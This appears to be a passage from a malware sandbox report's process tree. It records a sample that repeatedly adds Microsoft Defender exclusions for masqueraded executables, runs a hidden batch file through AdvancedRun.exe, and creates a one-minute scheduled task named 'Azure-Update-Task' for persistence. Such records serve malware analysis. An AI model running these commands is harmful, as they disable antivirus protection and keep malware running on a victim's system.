- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2172
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4900
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:1340
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6208
- - C:\Users\Admin\AppData\Local\Temp\15076ef2-b898-4b05-9faa-974451807520\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\15076ef2-b898-4b05-9faa-974451807520\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\15076ef2-b898-4b05-9faa-974451807520\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    PID:3192
  - - C:\Users\Admin\AppData\Local\Temp\15076ef2-b898-4b05-9faa-974451807520\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\15076ef2-b898-4b05-9faa-974451807520\AdvancedRun.exe" /SpecialRun 4101d8 3192
      4⤵
      PID:5688
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:3096
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:2716
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
      4⤵
      Creates scheduled task(s)
      PID:7176
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:7768
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7624
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6296
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7816
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2364
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4560
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4748
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5504
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7232
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4596
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6104
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5200
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4316
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6000
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4308
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6184
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2444
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7900
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7800
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7908
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5740
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6020
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7824
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4336
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6860
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6848
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:8132
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2244
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7492
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:3476
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2388
- - C:\Users\Admin\AppData\Local\Temp\a0f962bc-e445-4d69-bbb5-84816bc9c40a\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\a0f962bc-e445-4d69-bbb5-84816bc9c40a\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\a0f962bc-e445-4d69-bbb5-84816bc9c40a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    PID:1424
  - - C:\Users\Admin\AppData\Local\Temp\a0f962bc-e445-4d69-bbb5-84816bc9c40a\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\a0f962bc-e445-4d69-bbb5-84816bc9c40a\AdvancedRun.exe" /SpecialRun 4101d8 1424
      4⤵
      PID:4196
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7548
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:4832
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:1896
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:4312
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
      4⤵
      Creates scheduled task(s)
      PID:7696
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5904
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6220
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7776
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4268
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5972
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:1340
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4900
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4172
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5272
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4376
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5608
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7612
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7704
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4700
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4824
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4656
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2176
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:3796
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7008
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7196
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5212
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:920
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6284
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6264
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6448
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7544
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:2084
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:8180
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6652
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4888
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5244
- - C:\Users\Admin\AppData\Local\Temp\c4705abb-f65c-462e-8ef9-639780ac7f15\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\c4705abb-f65c-462e-8ef9-639780ac7f15\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\c4705abb-f65c-462e-8ef9-639780ac7f15\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    PID:3316
  - - C:\Users\Admin\AppData\Local\Temp\c4705abb-f65c-462e-8ef9-639780ac7f15\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\c4705abb-f65c-462e-8ef9-639780ac7f15\AdvancedRun.exe" /SpecialRun 4101d8 3316
      4⤵
      PID:2192
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6912
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:4348
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
      4⤵
      Creates scheduled task(s)
      PID:7656
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:7796
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2316
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7496
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7556
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:3456
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6168
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6028
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7976
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6232
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7092
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6496
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7896
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6324
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5988
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6452
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:8000
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:928
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
